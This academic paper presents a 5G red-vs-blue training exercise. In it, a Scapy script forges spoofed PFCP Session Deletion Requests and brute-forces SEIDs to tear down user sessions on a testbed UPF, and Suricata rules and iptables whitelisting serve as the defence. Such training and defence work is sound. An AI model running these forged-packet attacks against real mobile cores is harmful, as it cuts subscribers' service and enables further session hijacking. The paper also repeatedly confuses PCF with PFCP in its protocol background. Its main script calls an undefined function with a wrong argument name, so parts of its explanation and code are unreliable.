

Red vs. Blue Team Training Scenarios for 5G/6G Networks

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Abstract. 5G networks offer unprecedented speed, low latency, and support for massive device connectivity. However, a critical challenge in 5G networks is the lack of specialized cybersecurity education and training. This paper presents a red vs. blue team training scenario focusing on the PFCP teardown attack. Within the deployed 5G environment, the red team forges PFCP session deletion messages to prematurely terminate user sessions. In response, the blue team deploys detection and mitigation strategies using intrusion detection rules and firewall policies. The training scenario leverages Open5GS and UERANSIM and builds upon a containerized testbed to simulate realistic network conditions. The proposed training scenario bridges the gap between theoretical understanding and practical skills, offering an environment to explore protocol vulnerabilities and develop defenses for 5G networks. This work supports cybersecurity education for 5G networks and lays the foundation for building 5G and 6G cyber range platforms.

Keywords: 5G · Red Team · Blue Team · Cyber Range · PFCP.

1 Introduction

5G networks can optimize performance and allow configurations tailored to specific performance and security requirements of diverse use cases, ranging from autonomous vehicles [1], IoT ecosystems [2, 3], and telemedicine [4], to industrial automation [5, 6, 7]. However, this flexibility introduces new vulnerabilities due to the complex threat landscape, the expanded attack surface, and the reliance on virtualization and containerization technologies [8, 9, 10]. Common threats include session hijacking over the GPRS Tunnelling Protocol (GTP), data leakage, and Denial of Service (DoS) attacks [11, 12, 13]. A critical area of concern is the Packet Forwarding Control Protocol (PFCP), where malformed or spoofed PFCP message requests, such as session establishment, modification, or deletion requests, can be exploited to manipulate or disrupt user-plane traffic [14, 15].

A critical challenge in securing 5G is the lack of specialized education and training for red and blue teams engaged in offensive and defensive cybersecurity operations [16, 17]. These teams require hands-on experience with 5G-specific protocols; however, standardized and practical training programs that focus on the cybersecurity aspects of 5G networks remain limited [18, 19]. The Digital

Europe Programme (2021 - 2027) seeks to address existing skill shortages by funding initiatives aimed at developing digital competencies, including cybersecurity training for 5G technologies [20]. Nevertheless, the rapid evolution of 5G continues to outpace the development and implementation of corresponding cybersecurity curricula [21]. The security of 5G and future 6G networks depends on professionals' ability to identify and respond to threats. Without targeted training, red teams may miss critical vulnerabilities, and blue teams may struggle to mitigate advanced attacks. Practical training environments like cyber ranges are scarce but essential for developing skills in 5G protocols and virtualization [17].

1.1 Related Work

Other related research has been conducted to ensure robust security and isolation in 5G networks, leading to the development of various cyber ranges. For example, the project SANCUS¹ developed a 5G testbed to evaluate performance across firmware, virtualization, and management layers. A relevant work is Cyber5Gym by Hamza, Ejaz, and Kim [18], which provides a testbed for 5G cybersecurity training, enabling users to interact with predefined attack scenarios. In addition, SPIDER² introduced a cyber range with digital twins [22]. Additionally, Yigit et al. [16] highlighted the importance of cyber exercises in 5G-simulated environments, particularly for providing real-time feedback and strengthening operational preparedness. Despite efforts to secure Next Generation Radio Access Network (NG-RAN), it remains vulnerable due to its interfaces and role in Ultra-Reliable Low Latency Communications (URLLC) [23]. In our work, we demonstrate an approach that crafts forged PFCP messages to remotely delete or modify specific Packet Data Unit (PDU) sessions, without requiring local shell access to the User Plane Function (UPF). This method contrasts with traditional attacks that disrupt packet forwarding through direct kernel parameter manipulation. To support reproducibility and practical evaluation, we developed an attack script that enables controlled replication of this adversarial behavior.

PFCP and GTP protocols are particularly prone to termination attacks [24], [19]. In addition, regarding attacks on PFCP, Amponis et al. [23, 14] demonstrated the vulnerability of the PFCP by showing that unauthorized session control packets can be used to disrupt established 5G tunnels. In addition, Radoglou-Grammatikis et al. [25] provided an Artificial Intelligence (AI)-based Intrusion Detection System (IDS) in 5G networks using flow statistics and explainable AI. In another research, Jircan [26] introduced a red team tool exploiting 5G protocol weaknesses. To counter these vulnerabilities, several mitigation strategies have been proposed. Mitigation strategies include access controls, encryption, and dynamic security policies [27]. Thiruvassagam, Narayanan, and Zhang [28] proposed an SDN for IoT, while Chang, Wu, and Chen [7] suggested encryption for industrial slices but noted scalability issues. Mozo et al. [29] integrated ML-based attack detectors into 5G cyber ranges.

¹ <https://sancus-project.eu/>

² <https://spider-h2020.eu/>

Despite technical advances, the lack of 5G-specific cybersecurity education remains a significant barrier [30]. Cyber ranges are essential for hands-on training in cybersecurity, providing realistic environments for simulating attacks and defenses [18, 17, 31]. In addition, digital twins have been proposed as innovative tools to enhance 5G security training by creating accurate virtual replicas of network components [32, 33]. In other research, Pacherkar and Yan [34] presented a framework designed to detect and attribute attacks in 5G core networks. Moreover, Wen, Pacherkar, and Yan [35] developed a virtual testbed for 5G security research and training.

While previous works on 5G cybersecurity training have elaborated on network vulnerabilities [23, 36, 12, 15, 37, 38], there remains a notable absence of practical exercises that simulate realistic adversarial interactions between red and blue teams for attack and defense skill development. Building on existing advances, our work uniquely focuses on a red-blue team scenario, focused entirely on the PFCP protocol. We provide the attack script to demonstrate how red teams craft forged PFCP message requests and how blue teams detect and mitigate these attacks. Unlike prior studies, we examine how red teams craft forged PFCP message requests and how blue teams detect and mitigate these attacks. This integrated offensive-defensive approach deepens knowledge and expertise in 5G architecture and the PFCP protocol, while enhancing skills in attack detection and response.

1.2 Contributions

This paper presents the design and implementation of a realistic 5G attack-defense scenario. More specifically, a hands-on cybersecurity training scenario is presented focusing on the PFCP teardown attack, where the red team forges and injects session deletion requests to prematurely terminate user sessions within a 5G network slice. On the other hand, the blue team is tasked with detecting, analyzing, and mitigating the attack, thereby enhancing their defensive capabilities. A reproducible and extensible training environment is deployed using Open5GS³ and UERANSIM⁴ that offers practical exposure to 5G core components and the PFCP protocol. Specifically, the Docker images provided by Gradiant⁵ were utilized, simplifying the deployment and initialization of the 5G testbed. For the red team, attack scripts using Python and Scapy⁶ are utilized to craft forged PFCP message requests, while for the blue team, Suricata and iptables are employed to detect SEID brute-force attempts and enforce access control. The proposed red-blue team exercise deepens understanding of 5G protocols, such as PFCP, and supports operational readiness by bridging theoretical knowledge with practical experience. In general, the scenario not only enhances attack and defense skills, but also provides a better understanding of the underlying 5G protocols and architecture.

³ <https://open5gs.org/>

⁴ <https://github.com/aligungr/UERANSIM>

⁵ <https://github.com/Gradiant/5g-images>

⁶ <https://scapy.net/>

1.3 Paper Structure

The rest of this paper is organized as follows. Section 2 provides background information on the 5G architecture and the PFCP protocol. Section 3 details the red vs. blue team training scenario, and the associated hands-on exercises. Finally, Section 4 concludes the paper.

2 Background

To fully understand the operational flow within the 5G Core (5GC), it is essential to analyze the 5G architecture as presented in Fig. 1, focusing on how its internal components interact through standardized network interfaces (N) [39]. The Network Functions (NF) define the communication links and are the backbone of the Service-Based Architecture (SBA) adopted by 5GC, enabling modular, scalable, and interoperable communication between control UPF. The operational flow begins at the access network, where the next-generation Node B (gNB) connects the User Equipment (UE) to the 5GC using the N2 and N3 interfaces.

The Access and Mobility Function (AMF) handles signaling related to User Equipment (UE) registration, mobility management, and network slice selection. It is assisted by the Network Slice Selection Function (NSSF), which selects the appropriate network slice based on subscription data, network load, and slice availability. The AMF uses the N22 interface to communicate with the NSSF for slice selection and the N11 interface to interact with the Session Management Function (SMF) for coordinating user session management. The SMF is responsible for the establishment, modification of PDU sessions, which represent logical connections between the UE and the Data Network (DN). When a PDU session must be established, modified, or deleted, the AMF informs the SMF accordingly.

The gNB (Next Generation NodeB) bridges the Radio Access Network (RAN) with the core network. It handles both control plane signaling, communicating with the AMF via the N2 interface, and user plane data forwarding through the N3 interface to the UPF. Each network slice is a logically isolated network tailored to specific service requirements. The UPFs, responsible for user plane data forwarding, can be dedicated or logically assigned to these slices to ensure traffic isolation.

The Policy Control Function (PCF) manages the overall policy framework, ensuring enforcement of slice-specific Quality of Service (QoS) and charging rules through the N7 interface with the SMF. Together, these control plane functions enable the SMF to dynamically manage user sessions and adjust user plane behavior accordingly. AMF handles signaling related to UE registration, mobility, and slice selection, assisted by the NSSF, which selects the appropriate network slice based on subscription data, network load, and slice availability. Using the interfaces N11 (AMF-SMF) and N22 (AMF-NSSF), the AMF coordinates slice assignment and informs the SMF (Session Management Function) when user sessions must be established, modified, or deleted. The SMF allocates UPF 1 and

Explanation of the connections: (N1): UE-AMF, (N2): gNB-AMF, (N3): gNB-UPF, (N4): SMF-UPF, (N5): PCF-AF, (N6): UPF-External Data Network, (N7): SMF-PCF, (N8): AMF-UDM, (N9): UPF-UPF, (N10): SMF-UDM, (N11): AMF-SMF, (N12): AUSF-AMF, (N13): AUSF-UDM, (N14): AMF-AMF, (N15): AMF-PCF, (N22): AMF-NSSF

Fig. 1. 5G Core and connections

UPF 2, and manages this allocation via the N4 interface, based on the session and slice requirements.

PCF is the control plane protocol used by the SMF over the N4 interface to manage user plane rules on the UPF. While the UPF enforces data plane rules, such as Packet Detection Rules (PDRs), Forwarding Action Rules (FARs), and QoS Enforcement Rules (QERs), PCF allows the SMF to remotely create, modify, or delete these rules. This mechanism enables dynamic adaptation of forwarding and QoS policies to reflect mobility, policy updates, or slice reassignments, ensuring that user traffic is processed and routed according to the current slice-specific requirements.

2.1 The Role of PCF

The AMF handles UE authorization and initiates the slice selection process. The NSSF then determines the most suitable network slice based on service requirements and subscription criteria. The UPF is responsible for forwarding user data within the selected slice. Session control is achieved through the PCF over the N4 interface, allowing the SMF to install, modify, and delete forwarding rules on the UPF. While PCF and the PCF do not interact directly, the SMF translates PCF-defined policy decisions into PCF instructions. The structure of PCF is built upon a set of discrete components known as Information Elements (IE), which allow for session-related data between the control and user plane. IEs are essential for ensuring interoperability and accurate message parsing across diverse network components, facilitating tasks such as session establishment, modification, and deletion. Below is a list of common PCF messages and their

corresponding hexadecimal codes, which are essential for managing session life-cycles:

- **Session Establishment Request** (Hex Code 0x32): Initiates the creation of a new PFCP session. It carries the necessary parameters to establish user plane resources.
- **Session Establishment Response** (Hex Code 0x33): Acknowledges the establishment request. Confirms successful setup or indicates failure with cause information.
- **Session Modification Request** (Hex Code 0x34): Requests changes to an existing session, such as updating QoS or forwarding rules. Enables dynamic adjustment of session parameters.
- **Session Modification Response** (Hex Code 0x35): Confirms the modifications requested. Provides the status of the update, success or failure details.
- **Session Deletion Request** (Hex Code 0x36): Initiates termination of a PFCP session. Frees up resources associated with the session.
- **Session Deletion Response** (Hex Code 0x37): Acknowledges the deletion request. Confirms session removal or reports errors if deletion failed.

Each IE represents a specific type of information, including, among others, session identifiers, QoS rules, and IE types, as defined by the ETSI⁷ standards. These elements follow a standardized format that includes fields for the IE type, length, and value, enabling flexible and extensible communication within PFCP messages.

PFCP messages, if intercepted or spoofed, can allow an attacker to send messages and change an active user session by manipulating session state on the UPF. Understanding the PFCP message types and their protocol headers is critical for developers and engineers, as these headers contain essential information required to interpret and process the fundamental commands that control session lifecycles effectively within the 5G core network architecture.

3 Red vs. Blue Team: PFCP Session Teardown Attack

To support this exercise, a 5G testbed based on Open5GS was deployed that includes key network functions such as AMF, SMF, UPF, allowing researchers and developers to build, test, and experiment with 5G components in a realistic setting without relying on proprietary hardware or software. Specifically, the deployment script provided by Gradiant⁸ was used to set up the 5G testbed, integrating Open5GS⁹ and UERANSIM¹⁰ into a unified installation. Within this environment, the red team aims to exploit the PFCP protocol to delete PDU sessions (teardown attack). The interaction between the red and blue team actions is illustrated in Fig. 2.

⁷ <https://www.etsi.org> – ETSI TS 129 244

⁸ <https://github.com/Gradiant/5g-images>

⁹ <https://open5gs.org/>

¹⁰ <https://github.com/aligungr/UERANSIM>

Fig. 2. Sequence diagram: red vs. blue team

The red team first conducts reconnaissance to gather network intelligence and analyze the PCFP packet structure. Next, it employs brute-force enumeration to identify valid SEIDs. The final step is to craft forged PCFP messages to terminate legitimate PDU sessions. On the other hand, the blue team identifies these adversarial activities and protects the network by implementing countermeasures, including anomaly detection using an IDS, and enforcing firewall policies to block requests from unknown IP addresses, preventing unauthorized session deletions.

A detailed explanation of the attack process is provided by breaking down each step. Initially, 5G components, such as gNBs and the UPF, are identified within the local network (see Fig. 2). Then, the red team starts monitoring for any PCFP traffic on UDP port 8805 to extract session data from control-plane signaling between the SMF and UPF. Using Scapy as a Python library, the red team forges PCFP session deletion requests. This involves conducting brute-force attacks on SEID values to discover valid SEIDs. Once a legitimate SEID is identified, the forged messages are injected to modify forwarding rules and tunnel endpoints.

The blue team mitigates these threats by continuously monitoring control-plane traffic using Suricata¹¹. Alert rules are configured to detect potential brute-force SEID discovery attempts, specifically triggering when more than three PFCP session deletion (0x36) messages originate from the same IP address within a 10-second interval. Furthermore, iptables¹² are employed to restrict PFCP traffic exclusively to trusted sources, effectively blocking unauthorized UDP packets on port 8805. This measure prevents the injection of malicious PFCP messages and thereby mitigates session deletion attacks.

3.1 Assumptions

Several security assumptions and protocol limitations are considered in the context of PFCP-based attacks. The deployment of the scenario and the exercises are based on the following assumptions:

- **Network Access:** The red team maintains access to the N4 interface, which is not properly isolated, allowing traffic interception and injection, as well as the ability to send message requests from the SMF to the UPF, thereby establishing a foothold within the network core for potential further attacks.
- **Unencrypted PFCP:** PFCP messages are typically transmitted in plaintext over UDP without built-in encryption, which means they can be inspected or forged by an attacker with network access. The 3GPP standard does not mandate encryption for PFCP, so security relies on mechanisms like IPsec tunnels or secure network segmentation to protect the control traffic.
- **Lack of PFCP Authentication:** There is no built-in authentication or message integrity validation in the PFCP protocol stack, enabling message forgery or unauthorized session manipulation.
- **SEID Predictability:** SEIDs are either sequential, weakly randomized, or easily guessed, allowing the red team to discover fast using brute force.

3.2 Red Team Exercise

The red team scenario is presented in the sequence diagram (Fig. 3). The steps for the red team to perform a PDU session teardown attack are as follows:

1. **Reconnaissance 1 - ARP Scanning:** The red team performs Address Resolution Protocol (ARP) scans to discover IP and MAC addresses of key 5G components like the UPF and AMF (Listing 1.1). This allows mapping of the core network infrastructure.
2. **Reconnaissance 2 - Packet Capture and Port Monitoring:** By listening on UDP port 8805, the red team passively captures PFCP traffic (Listing 1.2). This analysis helps identify communication flows and extract useful metadata such as SEIDs.

¹¹ <https://suricata.io/>

¹² <https://git.netfilter.org/iptables/>

Fig. 3. Red team exercise

3. **Brute-force Enumeration for SEID Discovery:** The red team systematically guesses SEIDs and sends forged message requests using a malicious SMF. This exploits the lack of authentication in PFCP session handling. This vulnerability facilitates the capability to send session messages and manipulate active PFCP sessions.
4. **PFCP Session Deletion:** This step involves an adversary sending forged PFCP Session deletion request messages to the UPF. By deleting the legitimate session first, the red team clears any conflicting state and avoids potential validation checks by the UPF. By deleting the legitimate session, the adversary ensures that the PDU session is terminated, thereby eliminating any conflicting session state and circumventing potential validation mechanisms enforced by the UPF. ++ This creates the opportunity for the red team to send session modification requests.
5. **PFCP Modification Request (not analyzed in this paper) :** Following a successful session deletion, the red team can craft and send forged PFCP session modification request messages to the UPF. This unauthorized mod-

ification allows the red team to redirect network traffic to a malicious destination, enabling man-in-the-middle attacks, traffic interception, and data exfiltration (these attacks are not discussed in this paper).

The first step in interacting with the 5G network is to discover the key components deployed within the local network (Listing 1.1). This scan helps identify active nodes such as gNBs and UPFs, which are critical elements of the 5G core and radio access network.

Listing 1.1. Reconnaissance 1 - ARP scanning

```

1 arp-scan --localnet --interface eth0
2
3 #ARP Scan Results: The red team identifies network elements, including↔
   gNBs and the UPF, with their corresponding IP addresses, label=
4 172.19.0.16   gNB1
5 172.19.0.18   gNB2
6 10.45.0.1     UPF

```

With the assumption of having network access to the interface or link between the SMF and UPF, once the relevant network components are discovered, the next task is to monitor control plane traffic, and especially PFCP messages. Since PFCP communication occurs over UDP on port 8805 between the SMF and UPF, network traffic monitoring tools such as tcpdump¹³ and Wireshark¹⁴ will be used to capture the network traffic and inspect PFCP messages and their packet structure (Listing 1.2).

Listing 1.2. Reconnaissance 2 - Packet capture and port monitoring

```

1 #Monitor network traffic using filters to capture PFCP messages.
2 tcpdump -i eth0 udp port 8805 -w pfcip_traffic.pcap
3
4 #In Wireshark, the filter is: udp.port == 8805 \&\& pfcip

```

Building on this passive analysis, the red team transitions to active interaction with the network by forging and transmitting PFCP message requests. A brute-force technique is applied to discover active SEIDs, which are essential for maintaining and managing PFCP sessions. As shown in Listing 1.3, this method systematically iterates over a range of SEID values and sends queries to the UPF, monitoring for differential responses that may reveal valid identifiers.

Listing 1.3. Brute-force enumeration for SEID discovery

```

1 def brute_force_session_deletion(spoofed_src_ip: str, dst_ip: str,↔
   start_seid: int, end_seid: int, interval: float):
2     seq = 1 # Initial sequence number
3     for seid in range(start_seid, end_seid + 1): # Loop through SEID ↔
         range
4         pkt = forge_pfcip_deletion_request(spoofed_src_ip, dst_ip, seid↔
           , seq) # Create PFCP packet
5         send(pkt, verbose=False) # Send packet
6         print(f"Sent DELETE Request: spoofed_src={spoofed_src_ip}, dst↔
           ={dst_ip}, SEID=0x{seid:016x}, SEQ={seq}") # Log

```

¹³ <https://www.tcpdump.org/>

¹⁴ <https://www.wireshark.org/>

```

7         seq = (seq + 1) & 0xFFFFFFFF or 1 # Increment and wrap 3-byte ←
          sequence
8         time.sleep(interval) # Wait between packets

```

Once a valid SEID is identified through the brute-force enumeration, the red team can exploit the PFCP session handling mechanism by crafting and sending forged PFCP messages. Specifically, by constructing a session deletion request (message type 0x36) and sending the forged message to the UPF, the red team can terminate the corresponding PDU session. It is important to note that we do not have direct access to the UPF (see Section 3.1). Therefore, the attack relies on the ability to send such crafted messages into the network where the UPF listens. Listing 1.4 presents how the script crafts the forged deletion message request. The red team constructs the PFCP message in accordance with protocol specifications, including forging the header and payload. The message is transmitted via UDP to the UPF. Upon processing, the unauthorized deletion request causes the UPF to terminate the associated PDU session effectively performing a session teardown attack.

Listing 1.4. Session deletion requests using forged PFCP messages

```

1 from scapy.all import IP, UDP, Raw, send
2 import struct, time, argparse, os
3
4 # PFCP Constants
5 PFCP_VERSION = 1 # PFCP protocol version
6 PFCP_SESSION_DELETION_REQUEST = 0x36 # Message type for Session ←
   Deletion Request, 0x34 for Modification Request
7 PFCP_PORT = 8805 # Default PFCP port
8
9 #Forge a PFCP Session Deletion Request, src_ip: the compromised node ←
   ip, dst_ip: destination IP to send the packets (usually the UPF), ←
   seid: session endpoint identifier for deletion, seq: 3-byte value ←
   defining the type of request
10
11 def forge_pfcpl_deletion_request(src_ip: str, dst_ip: str, seid: int, ←
   seq: int) -> "scapy.packet.Packet":
12     # Flags: version (3 bits) shifted left 5 + S-bit set to 1 (SEID ←
   present)
13     flags = (PFCP_VERSION << 5) | 0x01
14
15     # Pack SEID as 8-byte big-endian
16     seid_bytes = struct.pack("!Q", seid)
17     # Pack sequence number as 4 bytes and slice off the first byte to ←
   get 3-byte value
18     seq_bytes = struct.pack("!I", seq)[1:]
19     # Spare byte for 4-byte alignment
20     spare = b"\x00"
21
22     # Construct the payload: SEID (8B) + Sequence Number (3B) + Spare ←
   (1B)
23     payload = seid_bytes + seq_bytes + spare
24     length = len(payload) # Total PFCP payload length (should be 12 ←
   bytes)
25
26     # PFCP Header: Flags (1B), Message Type (1B), Length (2B)
27     header = struct.pack("!BBH", flags, PFCP_SESSION_DELETION_REQUEST, ←
   length)
28

```

```

29     # Build and return full Scapy packet: IP / UDP / PFCP Raw payload
30     return (
31         IP(src=src_ip, dst=dst_ip) /
32         UDP(sport=PFCP_PORT, dport=PFCP_PORT) /
33         Raw(load=header + payload)
34     )

```

PFCP messages require precise formatting of the relevant IE with proper type, length, and value fields, as well as accurate length calculations in the header. The function constructs the PFCP header, embeds the SEID, and appends the target slice. This packet is then encapsulated within IP and UDP layers and sent to the specified destination. To initiate the SEID enumeration process, basic parameters including the IP addresses and the relevant network interface must be defined by the red team (Listing 1.5).

Listing 1.5. Main script that invokes the SEID bruteforce and the session deletion requests

```

1 from scapy.all import *
2 import argparse
3 import os
4 def main():
5     parser = argparse.ArgumentParser(description="PFCP Session ↵
6         Establishment") # Create argument parser
7     parser.add_argument("--red-team-ip", required=True, help="Attacker↵
8         's IP address") # Add red team IP argument
9     parser.add_argument("--upf-ip", required=True, help="Target UPF IP↵
10        address") # Add target UPF IP argument
11    parser.add_argument("--interface", default="eth0", help="Network ↵
12        interface to use") # Add interface argument with default
13    args = parser.parse_args() # Parse command-line arguments
14    brute_force_seid(args.attacker_ip, args.upf_ip) # Call SEID brute↵
15        -force function

```

3.3 Blue Team Exercise

The sequence diagram (Fig. 4) depicts the defensive strategy employed by the blue team to counter the red team operations, first by detecting PFCP deletion requests. Upon detection, the blue team enables the system to block suspicious sources and enforces firewall rules to prevent unauthorized access and block subsequent malicious requests.

The steps for the blue team are as follows:

1. **Detection - SEID Brute-force Enumeration Attempts using IDS:** This detection method uses an IDS (i.e., Suricata) that monitors PFCP session messages that contain SEIDs. A brute-force enumeration attempt is characterized by a high rate of PFCP messages originating from a single IP address, each targeting different SEIDs in quick succession. Listing 1.6 illustrates the IDS-Suricata rule.
2. **Response - PFCP Access Restriction Using Firewall Rules:** Once brute-force behavior is detected, the mitigation strategy is to restrict PFCP

Fig. 4. Blue team exercise

traffic by adding the firewall rules. This is achieved by configuring the firewall (i.e. iptables) to allow only legitimate PFCP traffic from pre-approved control plane nodes (i.e., AMF, SMF). All other PFCP traffic is dropped (see Listing 1.7).

The IDS rules for Suricata (Listing 1.6) support blue teams in detecting SEID brute-force attempts, malformed IEs, and checksum issues, while deepening their understanding of 5G protocols like PFCP and session management.

Listing 1.6. Suricata rules for detecting PFCP anomalies

```

1
2 # Rule 1: Potential SEID brute force attack
3 alert udp any any -> any 8805 (
4     msg:"PFCP possible SEID brute force -> 3 session mod/delete ←
5         requests from same IP";
6     flow:to_server;
7     pcre:"/[\\x36\\x34]/";
8     detection_filter:track by_src, count 3, seconds 10;
9     sid:1003003;)
10 # Rule 2: Abnormal IE type values
    
```

```

11 alert udp any any -> any 8805 (
12     msg:"PFCP packet with abnormal IE Type detected";
13     content:"|0A 00|";           # Detect PFCP requests containing an ↵
        unknown IE type 2560 (0x0A00 in hexadecimal), to capture the ↵
        specific invalid IE type.
14     offset:0;                   # adjust based on PFCP payload start
15     depth:100;                  # search first 100 bytes of payload
16     sid:1003004;)
17
18 # Rule 3: Possible unknown or malformed IE
19 alert udp any any -> any 8805 (
20     msg:"PFCP packet with IE Type field > 0xFF (unknown or malformed ↵
        IE)";
21     byte_test:2,>,255,12,relative; # Reads 2 bytes starting 12 bytes ↵
        into the PFCP header. It checks if this 2-byte value is ↵
        greater than 255 (0xFF). Relative means that the offset (12) ↵
        is counted from the start of the PFCP protocol header
22     sid:1003005;)
23
24 # Rule 4: Invalid UDP checksum
25 alert udp any any -> any 8805 (
26     msg:"PFCP UDP packet with invalid checksum detected";
27     checksum:invalid;
28     sid:1003006;)

```

Rule 1 targets SEID brute-force attacks that disrupt sessions by detecting repeated session modification or deletion requests (types 0x34 and 0x36) from the same IP. It triggers if more than three such requests occur within 10 seconds, with adjustable thresholds. Rules 2 and 3 detect malformed or abnormal IE types that fall outside the expected ranges, flagging crafted packets that may exploit protocol vulnerabilities. Rule 2 specifically inspects PFCP packets for an IE Type with the unusual value 2560 (0x0A00 in hexadecimal), which lies outside the valid IE type range and may indicate a crafted or malicious packet. Rule 3 checks the IE Type fields that exceed the standard range (greater than 255 or 0xFF in hexadecimal), helping to identify unknown or malformed IEs that could signify protocol misuse or corruption. Rule 4 flags packets with invalid UDP checksums, which may indicate data corruption or tampering, potentially affecting the integrity of the 5G control plane.

Regarding the response of the blue team, in this step, traffic should be restricted to trusted sources. Rather than only blocking known suspicious IPs, a stricter policy is followed which allows PFCP traffic solely from predefined legitimate control plane nodes (i.e., whitelisting). As shown in Listing 1.7, iptables are utilized for implementing the proposed whitelisting approach.

Listing 1.7. Response - PFCP access restriction using firewall rules

```

1 # Allow PFCP traffic only from the trusted Control Plane node
2 iptables -I INPUT -p udp --dport 8805 -s <trusted_pfcp_ip> -j ACCEPT
3
4 # Drop all other incoming PFCP traffic on port 8805
5 iptables -A INPUT -p udp --dport 8805 -j DROP

```

3.4 Learning Outcomes from the 5G Red and Blue Team

The red team exercises offer an in-depth exploration of offensive cybersecurity strategies within the 5G core network, emphasizing the exploitation of PFCP protocol.

– **Red Team Learning Outcomes:**

- Comprehensive understanding of the PFCP protocol and its centric role in 5G.
- Monitoring using tools like tcpdump and Wireshark, as well as forging and injecting custom PFCP messages with Scapy to simulate sophisticated cyberattacks.
- Practical experience in simulating real-world cyberattacks in a controlled 5G environment, fostering strategic offensive methodologies.

The blue team exercises include defensive strategies to safeguard the 5G core network against PFCP-targeted cyberattacks. Through advanced monitoring, anomaly detection, and strategic application of IDS and firewall rules, the scenario helps to develop the required expertise to detect and mitigate threats, enforce network isolation, and enhance overall network security.

– **Blue Team Learning Outcomes:**

- Proficiency in monitoring and analyzing PFCP traffic on the N4 interface using packet capture tools such as tcpdump to identify malicious activities.
- Deployment of IDS rules using Suricata to identify suspicious PFCP traffic.
- Implementation of network isolation strategies, using firewall rules with iptables, to block malicious PFCP packets and enforce network isolation.

4 Conclusions

This paper introduced a hands-on cybersecurity training scenario centered on the PFCP teardown attack within a 5G testbed built on Open5GS. The red team forges and injects session deletion requests to terminate PDU sessions, while the blue team identifies these adversarial activities and responds by blocking malicious requests. We provide attack scripts using Python and Scapy to demonstrate how red teams can craft forged PFCP message requests as well as IDS and firewall rules using Suricata and iptables, respectively. By bridging the gap between theoretical knowledge and operational expertise, our approach addresses the lack of practical exercises in 5G networks. Future work includes the development of additional training exercises and the implementation of a 5G cyber range that incorporates also AI-focused scenarios addressing adversarial and robust AI techniques tailored to 5G networks.

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